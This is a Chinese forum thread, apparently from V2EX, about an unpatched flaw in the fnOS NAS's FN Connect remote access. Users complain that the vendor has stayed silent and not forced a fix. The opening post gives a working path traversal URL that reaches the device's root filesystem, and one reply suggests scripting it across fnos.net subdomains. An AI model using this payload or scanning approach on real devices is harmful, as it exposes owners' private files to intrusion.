GoForum🌐 V2EX

飞牛这个漏洞 POC 太容易了啊

Tink · 2026-01-31 23:12 · 0 次点赞 · 15 条回复

打开 FN Connect 随便输入一个 id ,只要撞上了能打开登录页,加上

/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../

直接就到 /了啊

太离谱了

15 条回复
stinkytofux · 2026-01-31 23:32
#1

0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害.

Tink · 2026-01-31 23:37
#2

@stinkytofux 官方为什么不强推新版本呢,强制修复漏洞

Joming · 2026-01-31 23:42
#3

TMD 到现在都没发公告!好在公司发现比较早,不然严重泄露信息!再不会用了!

wfhtqp · 2026-01-31 23:42
#4

问题是飞牛不当回事,fnid 现在还不暂停,原来没有公网的也全暴漏了

wfhtqp · 2026-01-31 23:42
#5

https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。

YJBZC · 2026-01-31 23:57
#6

@wfhtqp 我草,飞牛官方团队在一个多月前就知道这个漏洞了,到今天都没发个公告或者强制更新修复

wfhtqp · 2026-02-01 00:17
#7

@YJBZC 这才哪到哪? fn connect 还开着呢

labubu · 2026-02-01 00:27
#8

不是绑定手机了吗,打电话发短信给用户呗?

bitkuang · 2026-02-01 00:37
#9

没复现出来,还有别的条件吧

haoshuaiwang · 2026-02-01 00:42
#10

写个脚本跑就行了

{fnid}.fnos.net

baton · 2026-02-01 00:47
#11

经历过宝塔后就不敢用国内这些面板,安全性是个大问题

a9htdkbv · 2026-02-01 00:52
#12

还好我有先见之明,昨天早上关闭 fn connect ,晚上就把整个飞牛虚拟机扬了

emoker · 2026-02-01 01:27
#13

@baton 请教宝塔具体是啥问题?之前没关注过

AkinoKaedeChan · 2026-02-01 01:32
#14
flyqie · 2026-02-01 01:42
#15

是的,之前以为飞牛官方会做紧急的限制,现在看来似乎没有任何限制,不知道是限于架构问题做不了还是不想做。

添加回复
你还需要 登录 后发表回复

登录后可发帖和回复

登录 注册
主题信息
作者: Tink
发布: 2026-01-31
点赞: 0
回复: 0